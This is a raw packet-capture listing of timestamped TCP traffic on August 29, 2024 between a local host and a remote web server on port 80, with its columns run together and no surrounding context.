                                    Aug 29, 2024 12:02:33.731755018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.731765032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.731765985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.731802940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.731806993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.731813908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.731844902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.731868982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.732606888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.732620955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.732634068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.732647896 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.732650995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.732660055 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.732678890 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.732691050 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.734469891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.734512091 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.820790052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820815086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820830107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820847034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.820853949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820864916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820871115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.820877075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820889950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820902109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820904016 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.820921898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.820921898 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.820949078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.820975065 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.821130037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.821147919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.821158886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.821171999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.821183920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.821206093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.979878902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979902983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979914904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979926109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979937077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979954004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979964018 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.979965925 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979975939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979985952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.979995012 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980000019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980012894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980038881 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980050087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980060101 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980087042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980420113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980432034 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980442047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980473995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980496883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980509996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980545998 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980720997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980732918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980743885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980768919 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980783939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980865955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980875969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980885983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980897903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.980911016 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.980941057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.981188059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981239080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.981276035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981287956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981326103 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.981404066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981415033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981425047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981441021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981452942 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.981487036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.981646061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981657028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981667995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981678009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981688976 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.981688976 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981700897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.981712103 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.981755972 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.982214928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982225895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982237101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982259989 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.982280970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982285023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.982292891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982302904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982315063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982323885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.982352018 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.982378960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982391119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982428074 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.982434034 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982445955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982459068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982470036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.982481956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.982506990 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:33.983067036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:33.983108044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.071743965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071769953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071783066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071795940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071805954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071819067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071836948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071847916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071866035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.071984053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072108030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072119951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072129965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072140932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072151899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072159052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072165966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072176933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072177887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072196007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072218895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072559118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072570086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072580099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072602034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072628021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072741032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072752953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072763920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072776079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072782040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072802067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072838068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072869062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072880983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072890043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072901964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.072907925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072927952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.072954893 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.073071003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.073115110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.073198080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.073209047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.073246956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.073559999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.073574066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.073585987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.073601007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.073618889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.073647022 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.231596947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231620073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231637955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231648922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231661081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231673956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231688023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231698036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231746912 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231760025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231770039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231781960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.231836081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.231899023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232403040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232414007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232426882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232446909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232465982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232544899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232557058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232567072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232595921 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232616901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232662916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232676029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232707024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232738972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232749939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232762098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232777119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232784986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232822895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.232944012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.232985973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233017921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233030081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233047009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233061075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233086109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233364105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233380079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233391047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233412027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233443022 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233489037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233530045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233535051 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233544111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233601093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233661890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233674049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233685970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233699083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233711004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233711004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233721018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233733892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233747959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233763933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234019041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234030008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234064102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234215021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234256983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234440088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234462023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234474897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234483957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234487057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234498024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234509945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234510899 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234522104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234540939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234560966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234579086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234620094 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236809969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236823082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236835957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236872911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236888885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236917019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236927986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236938953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236949921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236954927 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236968040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236988068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237018108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237149000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237159967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237170935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237181902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237195015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237201929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237205029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237216949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237216949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237241983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237243891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237252951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237263918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237271070 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237276077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237287998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237289906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237306118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237318039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237324953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237329960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237356901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237371922 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237535954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237580061 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237598896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237615108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237627029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237653017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237673998 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237692118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237704039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237715006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237723112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237731934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237741947 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237744093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237755060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237760067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237776995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237807035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238087893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238099098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238130093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238147974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238154888 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238158941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238169909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238192081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238220930 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238293886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238306046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238317013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238327980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238341093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238342047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238352060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238364935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238385916 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238420010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238454103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238466024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238476992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238490105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238502979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238507032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238516092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238543987 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.239731073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.239787102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.239885092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.239932060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.239934921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240003109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240032911 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240050077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240081072 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240102053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240267992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240312099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240350962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240361929 CEST8049717172.67.128.117192.168.2.6
